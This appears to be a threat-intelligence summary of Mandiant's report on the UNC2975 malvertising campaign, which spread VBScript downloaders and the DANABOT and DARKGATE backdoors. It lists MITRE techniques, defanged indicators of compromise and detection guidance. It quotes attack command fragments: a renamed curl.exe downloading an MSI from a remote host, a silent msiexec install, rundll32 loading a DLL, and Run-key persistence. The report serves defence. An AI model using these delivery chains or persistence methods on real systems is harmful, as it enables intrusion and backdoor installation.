Threat Research

Opening a Can of Whoop Ads: Detecting and Disrupting a Malvertising Campaign Distributing Backdoors | Mandiant

GoogleCloudIntel

Mandiant tracked an UNC2975 malvertising campaign that used sponsored search and social ads pointing to fake “unclaimed funds” sites which delivered PAPERDROP and PAPERTEAR VBScript downloaders; those downloaders led to DANABOT and DARKGATE backdoors via multiple command-line delivery chains. Mandiant worked with Google’s Anti-Malvertising team to remove ads, published IOCs and detection guidance, and detailed execution and persistence behaviors for defenders. #UNC2975 #DANABOT

Keypoints

  • UNC2975 ran malvertising campaigns (search and social) using “unclaimed money” themed landing pages to trick users into downloading ZIP archives containing VBS downloaders.
  • The initial payloads were VBScript downloaders known as PAPERDROP (HTTPS) and PAPERTEAR (HTTP), which retrieved and executed second-stage payloads.
  • Mandiant observed three primary delivery chains: VBS → renamed curl.exe → MSI (msiexec), VBS → renamed curl.exe → AutoIt executable and .au3 script, and VBS directly invoking msiexec to install a package.
  • Secondary payloads included Delphi-based backdoors DANABOT and DARKGATE that used rundll32/msiexec, created Temp/AppData artifacts, modified proxy settings, and established persistence via Run keys or ServiceDll entries.
  • Adversaries abused legitimate ad platforms and evaded detection via impersonation, cloaking, redirects, and targeted ad controls (geofencing and audience attributes).
  • Mandiant provided detection opportunities, YARA rules, IOCs (domains, IPs, hashes), and collaborated with Google to remove malicious ad entries from the ads ecosystem.

MITRE Techniques

  • [T1583.008] Acquire Infrastructure: Purchase Ads – used to place malicious advertisements in search/social results to lure victims (‘purchase advertisements [MITRE ATT&CK® Technique T1583.008] for malicious websites’).
  • [T1189] Drive-by Compromise – ad-driven web pages delivered malicious ZIPs and scripts leading to infection (‘drive-by compromise [T1189]’).
  • [T1059.005] Command and Scripting Interpreter: Windows Script Host – VBS payloads executed via WScript/WScript.exe to initiate download/execution (‘”C:WindowsSystem32WScript.exe” “C:Users<user>AppDataLocalTemp…flast_d45534i.vbs”‘).
  • [T1105] Ingress Tool Transfer – downloaders and renamed curl binaries retrieved MSI/AUTOIT payloads from remote hosts (‘renamed cURL … to download the file SYUxEbPz.msi … https[:]//durham.soulcarelife[.]org’).
  • [T1218.007] Signed Binary Proxy Execution: Msiexec – attackers used msiexec to quietly install malicious packages masquerading under benign extensions (‘msiexec /i C:programDataHLWOIRTAA9P.bin /qn’).
  • [T1218.011] Signed Binary Proxy Execution: Rundll32 – rundll32 was used to load malicious DLLs and launch backdoors in-memory (‘rundll32.exe C:Users<user>AppDataLocalTempOadsoophotfp.dll,start’).
  • [T1036.008] Masquerading: Masquerade Task or Resource – installers and DLLs used benign-looking names/extensions to evade detection (‘masqueraded as a .bin file’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys – persistent Run key entries were created to relaunch backdoors (‘HKEY_USERS<user>SOFTWAREMicrosoftWindowsCurrentVersionRunSrfshu’).
  • [T1543.003] Create or Modify System Process: Windows Service – DANABOT variants could install a service using ServiceDll to achieve persistence (‘use a new Windows service using the ServiceDll entry’).
  • [T1053.005] Scheduled Task/Job: Scheduled Task – schtasks used to stop/start the Wininet Cache Task, potentially for Wininet API hooking (‘schtasks /End /tn MicrosoftWindowsWininetCacheTask’ and ‘schtasks /Run /tn MicrosoftWindowsWininetCacheTask’).
  • [T1562] Impair Defenses: Disable or Modify Tools – malware modified local proxy registry settings to manipulate traffic (‘HKEY_USERS<user>…Internet SettingsProxyServer | 127.0.0.1:15064’).
  • [T1047] Windows Management Instrumentation – PAPERTEAR enumerated local processes via WMI before reporting to C2 (‘try to collect a list of running processes via Windows Management Instrumentation’).
  • [T1204.002] User Execution: Malicious File – execution of VBS extracted from ZIP archives by user interaction led to script execution (‘Windows Script Host executing file in compressed archive’).
  • [T1027] Obfuscated Files or Information – PAPERDROP used junk code, Sleep calls, and string concatenation to evade static analysis (‘junk code … Sleep calls … reverse-order string concatenation’).
  • [T1036.003] Masquerade/Modify System Utilities – adversaries copied curl.exe to other filenames to masquerade and execute downloads (‘copy c:windowssystem32curl.exe ihcbzhY.exe’).
  • [T1566] Phishing (contextual mention) – phishing cited as one of the top initial access techniques in related trends (‘phishing [T1566]’).
  • [T1091] Replication Through Removable Media (contextual mention) – referenced in broader trends as a common initial access method (‘replication through removable media [T1091]’).

Indicators of Compromise

  • [Domain] UNC2975 campaign landing pages and droppers – www.claimprocessing[.]org, www.treasurydept[.]org, and 15+ other domains observed (e.g., plano.soulcarelife[.]org, infocatalog[.]pics).
  • [IP Address] Infrastructure and C2 hosts – 47.252.45[.]173, 35.203.111[.]228, and 6+ additional IPs used for downloads/C2.
  • [MD5 Hash] Malware samples and downloaders – 2c16eafd0023ea5cb8e9537da442047e (PAPERDROP Type I), 9f9c5a1269667171e1ac328f7f7f6cb3 (DARKGATE), and 4+ other hashes listed.
  • [File Name] Dropped/installers and DLLs – CoreReborn32.bin (DANABOT launcher), Oadsoophotfp.dll (dropper DLL), SYUxEbPz.msi, and other MSI/VBS/AutoIt filenames observed.

In executing these attacks, the actor purchased targeted ads that redirected victims to spoofed “unclaimed funds” sites where users submitted names and downloaded ZIP “reports” containing VBS files. Those VBS files (PAPERDROP/PAPERTEAR) were run via WScript and either wrote payloads to disk or executed command-line one-liners that copied and invoked a renamed curl.exe to fetch MSI installers or AutoIt payloads, or directly invoked msiexec to install packages that dropped backdoor components.

Post-installation behavior included rundll32 loading of malicious DLLs to decompress/deobfuscate backdoor payloads, outbound TLS/TCP communications to C2 IPs, local loopback proxying, creation of randomly named .tmp and extensionless files in AppData/Temp, and persistence via Registry Run keys or ServiceDll-backed services. PAPERTEAR variants appended enumerated local processes to HTTP POSTs and executed commands directly from HTTP responses, while PAPERDROP favored writing payloads to disk before execution.

Detection guidance focuses on watching for WScript launching scripts from TEMP/Downloads after archive extraction, unusual msiexec installs from ProgramData with masquerading extensions, renamed copies of curl.exe invoked via cmd.exe, rundll32 loading DLLs from user AppData, schtasks operations targeting Wininet Cache Task, and registry proxy/run-key modifications. Blocking identified domains/IPs, applying YARA rules provided, and collaborating with ad platforms (as Mandiant did with Google) are effective mitigation steps.

Read more: https://www.mandiant.com/resources/blog/detecting-disrupting-malvertising-backdoors

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint